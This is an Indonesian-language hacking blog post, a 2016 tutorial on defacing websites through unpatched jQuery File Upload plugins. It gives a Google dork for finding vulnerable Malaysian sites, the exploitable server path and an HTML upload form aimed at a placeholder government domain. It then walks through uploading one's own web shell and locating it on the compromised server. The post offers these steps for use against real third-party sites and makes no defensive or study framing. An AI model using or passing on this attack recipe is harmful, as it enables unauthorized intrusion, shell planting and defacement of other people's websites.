Tutorial Deface JQuery File Upload
Thursday 22 December 2016
Edit
Hai ^_^ ,.
dah lama ya mimin gak update ,yu no lah kan anak SMK gimana tugasnya :v.
dah,langsung aja ke TKP ,
Bahan-Bahan:
1.Default google dork : /assets/global/plugins/jquery-file-upload/ site:my (Kembangin lagi biar joss)
2.Exploit: http://target/assets/global/plugins/jquery-file-upload/server/php/ atau
http://target/[Patch]/assets/global/plugins/jquery-file-upload/server/php/ .
3.Script CSRF: Save dengan .html
Gunakan Copy & CTRL+C
<form method="POST" action="http://target.gov.my/public/templates/skin/plugins/jquery-file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</
4. Shell: pakek shell andalan kalian ^_^
Langkah-Langkah:
1.Masukan dork di atas atau dork yang sudah ente kembangin ,pilih target lalu masukan exploitnya,
jika vuln makan ada tulisan seperti ini: {"files":[{}] Atau {"files":[{blablablablabla}]
2.Masukan target anda ke script CSRF tadi .
3. Lalu Upload Shell Anda.
4. Akses shell ada di : http://target.gov.my/assets/global/plugins/jquery-file-upload/server/php/files/namashell.php
Oke sekian semoga berhasil ^_^